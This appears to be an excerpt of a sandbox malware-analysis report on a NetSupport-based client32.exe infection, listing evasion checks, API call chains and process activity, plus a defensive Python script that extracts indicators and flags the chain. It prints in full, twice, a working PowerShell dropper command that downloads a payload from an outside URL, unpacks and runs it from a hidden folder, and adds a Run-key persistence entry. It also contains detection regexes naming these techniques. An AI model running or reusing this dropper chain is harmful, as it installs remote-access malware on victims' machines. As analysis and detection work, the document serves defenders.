Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Evaded block: after key decision graph_11-93078
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Evaded block: after key decision graph_11-93113
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Evasive API call chain: GetLocalTime,DecisionNodes graph_11-92482
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_11-86960
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe API coverage: 6.5 %
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe API coverage: 2.6 %
Source: C:\Windows\System32\wscript.exe TID: 6724 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1336 Thread sleep count: 5441 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1912 Thread sleep count: 4379 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe TID: 1088 Thread sleep time: -234500s >= -30000s
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe TID: 572 Thread sleep time: -41900s >= -30000s
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe TID: 1088 Thread sleep time: -1841250s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2248 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA03130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6FA03226h
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_111273E0 GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_110BD520 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_1110F910 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,WriteFile
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_1110BD70 wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_110663B0 _memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError
Source: client32.exe Binary or memory string: VMware
Source: client32.exe Binary or memory string: VMWare
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe API call chain: ExitProcess graph end node graph_11-93243
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe API call chain: ExitProcess graph end node graph_11-87524
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe API call chain: ExitProcess graph end node graph_11-86930
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA128E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA187F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_1103179F SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Network Connect: 8.39.147.104 443
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_11113190 GetKeyState,DeviceIoControl,keybd_event
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
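The wscript.exe to powershell.exe "Process created" entry above is the whole infection path in one command line: an ExecutionPolicy bypass, a DownloadString fetch of a base64 blob, a ZIP written under %APPDATA%, client32.exe started from it, the directory marked Hidden, and an HKCU Run value for persistence. Two details matter for a responder: Get-Random's -Maximum is exclusive, so the drop directory suffix is any integer from -5 to 11 (the sandbox happened to draw -5), and the Hidden attribute means a listing of %APPDATA% without -Force will not show the directory. The following Python is an added example and not part of the Joe Sandbox report or of NetSupport; it extracts those indicators from the command line (copied verbatim from the entry above) by resolving the single-quoted variable assignments, and applies a small set of detection rules to constructed process-creation events. The second, benign event, the indicator names, and the three-hit alert threshold are assumptions for illustration.

```python
import re
from typing import Dict, List, Optional, Tuple

# Dropper command line copied verbatim from the "Process created" entry above.
DROPPER_CMDLINE = r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
""".strip()

# Constructed process-creation events shaped like the report's entries
# (parent image, child image, command line); not real Sysmon/ETW records.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": DROPPER_CMDLINE},
    {"parent": r"C:\Windows\explorer.exe",  # assumed benign admin shell, for contrast
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"powershell.exe" -NoProfile -Command Get-Service | Where-Object Status -eq Running'},
]

# --- IOC extraction ---------------------------------------------------------
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")            # $NAME='literal'
FILE_RE = re.compile(r"Join-Path\s+\$\w+\s+'([^']+)'", re.I)    # files joined onto the drop dir
DROPDIR_RE = re.compile(r"GetFolderPath\('(\w+)'\)\+'\\([^']+)'\+\$(\w+)")
RUNKEY_RE = re.compile(r"New-ItemProperty\s+-Path\s+(\S+)\s+-Name\s+(\S+)", re.I)


def resolve(token: str, env: Dict[str, str]) -> str:
    """Substitute $Var with its literal assignment if one was seen; literals pass through."""
    return env.get(token[1:], token) if token.startswith("$") else token.strip("'")


def extract_iocs(cmdline: str) -> Dict[str, object]:
    env = dict(ASSIGN_RE.findall(cmdline))
    url = next((v for v in env.values() if v.lower().startswith(("http://", "https://"))), None)
    folder: Optional[str] = None
    drop_dirs: List[str] = []
    m = DROPDIR_RE.search(cmdline)
    if m:
        folder, prefix, var = m.groups()
        rnd = re.search(r"\$" + re.escape(var)
                        + r"\s*=\s*Get-Random\s+-Minimum\s+(-?\d+)\s+-Maximum\s+(-?\d+)", cmdline)
        if rnd:
            lo, hi = int(rnd.group(1)), int(rnd.group(2))
            # Get-Random's -Maximum is exclusive: suffix is lo..hi-1, so a hunt must
            # cover every name in the range, not just the one the sandbox observed.
            drop_dirs = [f"{prefix}{n}" for n in range(lo, hi)]
        else:
            drop_dirs = [prefix + "*"]
    run_key = run_value = None
    p = RUNKEY_RE.search(cmdline)
    if p:
        run_key, run_value = resolve(p.group(1), env), resolve(p.group(2), env)
    return {"url": url, "base_folder": folder, "drop_dirs": drop_dirs,
            "files": FILE_RE.findall(cmdline), "run_key": run_key, "run_value": run_value}


# --- Detection --------------------------------------------------------------
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-e(?:x|p|xecutionpolicy)\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "remote_download": re.compile(r"DownloadString\(|DownloadFile\(|Invoke-WebRequest", re.I),
    "base64_decode": re.compile(r"FromBase64String\(", re.I),
    "zip_unpack": re.compile(r"ZipFile\]::ExtractToDirectory", re.I),
    "hidden_attribute": re.compile(r"\.attributes\s*=\s*'hidden'", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\Run\b", re.I),
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}


def detect(event: Dict[str, str]) -> Tuple[str, List[str]]:
    """Return ('suspicious' | 'benign', matched indicator names) for one process-creation event."""
    def base(path: str) -> str:
        return path.lower().rsplit("\\", 1)[-1]
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    if base(event["parent"]) in SCRIPT_HOSTS and base(event["image"]) == "powershell.exe":
        hits.insert(0, "script_host_spawned_powershell")
    # A lone -NoProfile or policy bypass from an admin's shell is routine; the report's
    # chain trips every indicator. Three or more is the (assumed) alert threshold here.
    return ("suspicious" if len(hits) >= 3 else "benign"), hits


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(detect(ev))
    print(extract_iocs(DROPPER_CMDLINE))
```

The IOC dictionary gives a responder the seventeen candidate directory names (XOQEKRYWQK-5 through XOQEKRYWQK11) to check under %APPDATA% with -Force, the CJYJHX value under HKCU\...\CurrentVersion\Run to remove, and the data.php URL to block; the detection side keys on the wscript.exe parent plus the combination of bypass, download, decode and persistence, which is what separates this chain from an administrator's one-off ExecutionPolicy bypass.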
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid
Source: client32.exe Binary or memory string: Shell_TrayWnd
Source: client32.exe Binary or memory string: Progman
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_11174898 __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_11174B29 _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_11174BCC __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_1116C24E GetLocaleInfoA
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_11174796 __getptd,_LcidFromHexString,GetLocaleInfoA
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_111746A1 GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_1117483D GetLocaleInfoW,_GetPrimaryLen,_strlen
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_11174B90 _strlen,_GetPrimaryLen,EnumSystemLocalesA
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_11174A69 __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA20F39 __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA21EB8 __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA21E5D GetLocaleInfoW,_GetPrimaryLen,_strlen
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA21DB6 __getptd,_LcidFromHexString,GetLocaleInfoA
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA2DC99 GetLocaleInfoA
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA21CC1 GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA2DC56 _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA2DB7C GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA1FAE1 ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 11_2_6FA21680 ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_11174BCC _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,GetLocaleInfoA,GetLocaleInfoA,__itow_s
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_1116C24E GetLocaleInfoA
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_111746A1 GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_11174B29 _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe Code function: 13_2_11174B90 _strlen,_GetPrimaryLen,EnumSystemLocalesA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
